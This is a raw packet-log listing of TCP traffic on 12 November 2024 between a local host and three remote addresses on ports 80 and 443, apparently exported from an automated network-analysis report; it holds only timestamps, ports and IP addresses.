Nov 12, 2024 00:06:06.728151083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728152037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728162050 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728166103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728177071 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728179932 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728182077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728209972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728223085 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728254080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728266001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728283882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728290081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728295088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728307009 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728307962 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728324890 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728333950 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728358030 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728369951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728391886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728415966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728483915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728494883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728506088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728521109 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728526115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728529930 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728548050 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728595018 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728641987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728652954 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728662968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728674889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728687048 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728696108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728699923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728712082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728713036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728724957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728732109 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728743076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728754044 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728754997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728765965 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728776932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728782892 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728789091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728801012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728802919 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728811979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728813887 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728825092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728837967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728837967 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728849888 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728862047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728867054 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728873014 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728874922 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728883028 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728902102 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728904009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728919029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728929043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728930950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728949070 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728955984 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728960991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728971004 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728976965 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.728981018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.728991985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729001045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729003906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729015112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729026079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729027033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729038000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729051113 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729054928 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729064941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729068995 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729084969 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729089975 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729096889 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729109049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729111910 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729134083 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729134083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729151964 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729155064 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729161978 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729180098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729185104 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729192019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729203939 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729212999 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729232073 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729253054 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.729952097 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729963064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729974031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729985952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.729996920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730000019 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730007887 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730020046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730027914 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730042934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730055094 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730119944 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730130911 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730140924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730153084 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730159998 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730165005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730175972 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730180025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730186939 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730197906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730202913 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730205059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730211020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730221033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730226040 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730232000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730243921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730252981 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730262995 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730274916 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730277061 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730287075 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730290890 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730298996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730314970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730315924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730328083 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730338097 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730338097 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730349064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730360031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730369091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730380058 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730381966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730391026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730401039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730402946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730413914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730424881 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730428934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730436087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730448008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730448008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730463028 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730464935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730477095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730483055 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730488062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730499983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730510950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730510950 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730521917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730524063 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730534077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730545044 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730549097 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730557919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730567932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730568886 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730580091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730587959 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730592012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730603933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.730612040 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.730642080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731338978 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731375933 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731391907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731403112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731420994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731427908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731432915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731443882 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731452942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731452942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731467009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731482029 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731616974 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731627941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731640100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731651068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731658936 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731662035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731673956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731673956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731684923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731695890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731703043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731707096 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731718063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731723070 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731724024 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731734037 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731745005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731758118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731765032 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731770992 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731776953 CET	80	49704	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:06.731790066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:06.731815100 CET	49704	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:08.225363970 CET	49674	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:08.225367069 CET	49675	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:08.331743002 CET	49673	443	192.168.2.5	23.1.237.91
Nov 12, 2024 00:06:08.946685076 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.946712971 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:08.946768999 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.946820974 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.946847916 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:08.946899891 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.946938992 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.946966887 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:08.947017908 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.947150946 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.947165966 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:08.947309017 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.947325945 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:08.947520971 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:08.947535992 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.017132998 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.017163038 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.017241001 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.017452955 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.017466068 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.543700933 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.543894053 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.543893099 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.553855896 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.553865910 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.554363012 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.554373980 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.554563999 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.554582119 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.555063009 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.555111885 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.555423021 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.555480957 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.555742979 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.555802107 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.560686111 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.560755014 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.561415911 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.561486959 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.561616898 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.561768055 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.561889887 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.561897993 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.561952114 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.561958075 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.562042952 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.562051058 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.615748882 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.615750074 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.615999937 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.621098042 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.621786118 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.621803999 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.622817039 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.622869968 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.623380899 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.623445034 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.623642921 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.623648882 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.678267002 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.751492023 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.759990931 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.760071993 CET	443	49706	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.760153055 CET	49706	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.763278961 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763333082 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763365984 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763411999 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.763415098 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763428926 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763461113 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.763566017 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.763601065 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.763607979 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.768888950 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.768971920 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.768985033 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.792489052 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.792500019 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.795619011 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.795665026 CET	443	49708	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.795799017 CET	49708	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.818770885 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.819150925 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.819164991 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.844244957 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.844283104 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.844309092 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.844321966 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.844360113 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.844366074 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.846689939 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.846719027 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.846744061 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.846751928 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.846788883 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.852596045 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.858398914 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.858450890 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.858458042 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.864489079 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.864521027 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.864566088 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.864573002 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.864809990 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.866066933 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.866076946 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.868062019 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.868166924 CET	443	49711	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.868249893 CET	49711	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.870507002 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.876156092 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.876185894 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.876245975 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.876252890 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.876295090 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.881620884 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.896826982 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.896872997 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.896879911 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925290108 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925328016 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925375938 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.925384045 CET	443	49707	142.250.185.196	192.168.2.5
Nov 12, 2024 00:06:09.925425053 CET	49707	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:09.925473928 CET	443	49707	142.250.185.196	192.168.2.5
